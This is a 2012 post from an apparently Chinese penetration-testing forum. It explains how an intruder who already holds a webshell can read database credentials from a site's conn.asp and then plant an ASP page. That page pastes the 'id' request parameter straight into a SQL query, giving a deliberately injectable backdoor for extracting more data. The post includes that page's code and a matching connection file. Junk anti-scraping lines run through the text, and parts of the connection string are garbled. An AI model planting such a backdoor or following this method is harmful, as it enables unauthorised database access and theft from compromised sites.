中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
+ h( \2 N3 N6 ?
9 X8 K0 \) R$ z6 n4 P4 o
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
; N# N8 e! u) ]& c$ U# N
, x/ h6 S2 i) F7 |1 a, L) @' `( j
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
^. G. ^8 ^7 G8 g6 L
& n* y% x1 b' H. W5 g( @
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
+ X) n' Y5 D1 v+ H: @; }) i1 f
2 T `/ t7 Q9 x
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
! H# w( o( |4 n& e* n& j4 j6 _
2 t9 d! k7 b k* G. R* z+ ~) m
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
9 Y/ u2 B% V D* @
$ k7 Z& Y' M# t
程序代码
: f% i! I: b# W$ G4 ~. s. X+ \/ q
<!--#include file="xx.asp"-->
1 u/ N3 K. u. F! O* |
<%
/ ~- x: O! m4 L0 }$ q0 O9 @
set rs=server.createobject("ADODB.recordset")
4 A6 G- J1 h& r& ^/ [% N2 W
id = request("id")
2 g+ q$ w* T- \+ y9 x: ?
strSQL = "select * from admin where id=" & id
0 o3 ]: _0 }6 Y0 h
rs.open strSQL,conn,1,3
) g. W# U6 I. Q$ i
rs.close
5 K) v; j* n8 f
%>
0 H9 w8 c! w* E) R- R
& a/ N# m) N3 @0 w. Q1 g
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
& v3 [% p& ?7 @3 L; G
/ g: G/ B2 o! `& H, c
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
- U) G& X9 r* S: }8 T
+ Y. B7 {' T4 v2 S6 H5 A- w
然后就要构造一个连接数据库的文件了,代码如下:
( o/ w+ I* c/ \9 b( E
程序代码
+ i) E, p( V5 J3 ?) a. g8 n/ U
<%
0 c5 O! _( z: N7 `; S& c
strSQLServerName = "000.000.000.000" '服务器名称或地址
4 S b6 ?: `& ]/ K& i
strSQLDBUserName = "sqlname" '数据库帐号
+ K( K0 {; g' ]. A( I( l
strSQLDBPassword = "sqlpass" '数据库密码
7 V N; i" D' }4 c o6 p
strSQLDBName = "sqldataname" '数据库名称
# [. {! K) \0 G+ z( @- M
Set conn = Server.CreateObject("ADODB.Connection")
; g2 L N4 P, s0 _0 V
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
" o0 S1 _- y m6 M
conn.open strCon
3 u* u4 _+ J5 {5 ]. k U
%>
8 U# ?. B& e2 Y1 |
1 x" i p+ u9 h) k6 J4 K
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
) c" p% G+ ^* I) T8 ^- u$ s- Y
' O! S3 b& ~% G. E
就这样,正常情况下,就OK了,伪造成功……
0 d9 p0 t _4 Z: i9 }3 O7 n: i+ Y8 l
. Y# ]1 v/ J. h& H/ T" o
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2